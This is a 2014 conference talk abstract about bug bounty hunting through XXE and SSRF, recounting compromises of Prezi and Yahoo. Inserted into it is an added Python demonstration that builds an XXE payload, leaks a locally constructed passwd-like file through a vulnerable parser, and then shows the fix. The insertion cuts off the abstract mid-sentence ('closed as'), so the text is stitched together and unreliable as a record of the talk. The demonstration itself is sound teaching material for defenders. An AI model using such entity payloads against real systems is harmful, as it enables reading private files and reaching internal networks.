Presentations - Hunting for Top Bounties

  • Location: Security Dome
  • Speaker: Nicolas Grégoire
  • Date and time: 10 October 2014, 15:20 - 16:05

After one of these stupid bets, I had to look at bug bounty programmes.

I first tried to apply a typical OWASP Top 10 methodology during the
Deutsche Telekom programme. Not very efficient... So I decided to
participate in other programmes with a focus on two narrow fields, XML and
SSRF. As expected, few people had a look at this area. As a result, I
totally pwned Prezi and Yahoo.

For both of them, I was quickly able to read non-privileged files
like /etc/passwd. I later accessed the private key of Prezi's cloud
deployment system (using an EC2/OpenStack trick) and got root privileges
on every outbound Yahoo proxy (with a vulnerability previously closed as
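
The "XML" side of the two fields above is the XXE bug class: a parser that honours external entities will read whatever a SYSTEM entity points at and echo it back to the client, which is how "read /etc/passwd" happens. The following is an added example, not the speaker's code or anything shown in the talk: it builds such a document, feeds it to Python's standard-library xml.sax parser with external general entities switched on (the vulnerable configuration) and then with them switched off (the fix), and returns what each parser hands back. The passwd-style file is constructed in a temporary directory so nothing real is read and the demo runs offline. The same entity could carry an http:// URL instead of file://, which is where XXE becomes SSRF; the example does not reproduce the EC2/OpenStack or Yahoo specifics, which the abstract does not describe.

```python
"""Added example (not from the talk): XXE file read via xml.sax, and the fix.
Standard library only; the "passwd" file is constructed in a temp dir."""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler


class NameCollector(xml.sax.handler.ContentHandler):
    """Collects the text of the first <name> element. expat may deliver the
    text in several characters() calls, so chunks are joined at the end."""

    def __init__(self):
        super().__init__()
        self._in_name = False
        self._chunks = []

    def startElement(self, tag, attrs):
        if tag == "name":
            self._in_name = True

    def endElement(self, tag):
        if tag == "name":
            self._in_name = False

    def characters(self, data):
        if self._in_name:
            self._chunks.append(data)

    @property
    def name(self):
        return "".join(self._chunks)


def build_xxe_document(target_url):
    """Attacker-controlled document: a SYSTEM entity whose body becomes
    whatever the parser fetches from target_url (file://, http://, ...),
    echoed back inside <name>."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE user [\n'
        '  <!ENTITY xxe SYSTEM "%s">\n'
        ']>\n'
        '<user><name>&xxe;</name></user>\n' % target_url
    ).encode()


def parse_name(xml_bytes, resolve_external_entities):
    """One feature flag decides whether SYSTEM entities are fetched and
    inlined (vulnerable) or silently dropped (safe)."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    handler = NameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.name


def parse_name_vulnerable(xml_bytes):
    return parse_name(xml_bytes, True)


def parse_name_hardened(xml_bytes):
    return parse_name(xml_bytes, False)


def run_demo():
    """Write a constructed passwd-like file, feed the same document to both
    parsers and return what each one gives the attacker."""
    secret = ("root:x:0:0:root:/root:/bin/bash\n"
              "deploy:x:1000:1000::/home/deploy:/bin/sh\n")  # constructed
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "passwd")
        with open(path, "w") as fh:
            fh.write(secret)
        doc = build_xxe_document("file://" + path)
        leaked = parse_name_vulnerable(doc)   # file contents come back
        blocked = parse_name_hardened(doc)    # entity dropped, empty text
    return {"secret": secret, "leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable parser returned:\n" + result["leaked"])
    print("hardened parser returned: %r" % result["blocked"])
```

Recent Python versions default feature_external_ges to off, but the hardened function sets it explicitly because the default has changed over time and other parsers (libxml2-based ones in particular) have their own switches for entity resolution and network access; the check a reviewer wants is that the flag is set, not that the default happens to be safe.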

Big compromises imply big rewards, and I earned the top reward from both
programmes. Around $25k in a few days, for pwning production networks;
that's a hobby that most sane people should enjoy!